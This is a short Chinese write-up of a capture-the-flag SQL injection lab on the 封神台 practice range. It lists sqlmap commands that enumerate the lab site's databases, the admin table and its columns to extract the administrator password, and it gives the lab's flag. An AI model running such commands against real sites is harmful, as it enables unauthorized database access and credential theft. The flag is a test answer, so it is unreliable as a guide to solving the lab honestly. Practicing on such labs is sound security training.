【封神台】SQL注入靶场练习(sqlmap)

靶场地址

https://hack.zkaq.cn

题目

【封神台】SQL注入靶场练习(sqlmap)_第1张图片

解题过程

1.进入题目
【封神台】SQL注入靶场练习(sqlmap)_第2张图片
2.只有个 点击查看新闻,点击进入

3.发现参数id,肯定就是我们要注入的参数了,先用sqlmap跑一遍

查询数据库
python sqlmap.py -u “http://rhiq8003.ia.aqlab.cn/?id=1” --dbs
【封神台】SQL注入靶场练习(sqlmap)_第3张图片
因为我们需要获得管理员密码,所以要查maoshe数据库
python sqlmap.py -u “http://rhiq8003.ia.aqlab.cn/?id=1” --tables -D maoshe
【封神台】SQL注入靶场练习(sqlmap)_第4张图片
查admin表
python sqlmap.py -u “http://rhiq8003.ia.aqlab.cn/?id=1” --columns -T admin -D maoshe
【封神台】SQL注入靶场练习(sqlmap)_第5张图片
查password
【封神台】SQL注入靶场练习(sqlmap)_第6张图片
输入flag :hellohack ,正确
【封神台】SQL注入靶场练习(sqlmap)_第7张图片

你可能感兴趣的:(web,sql,数据库,database)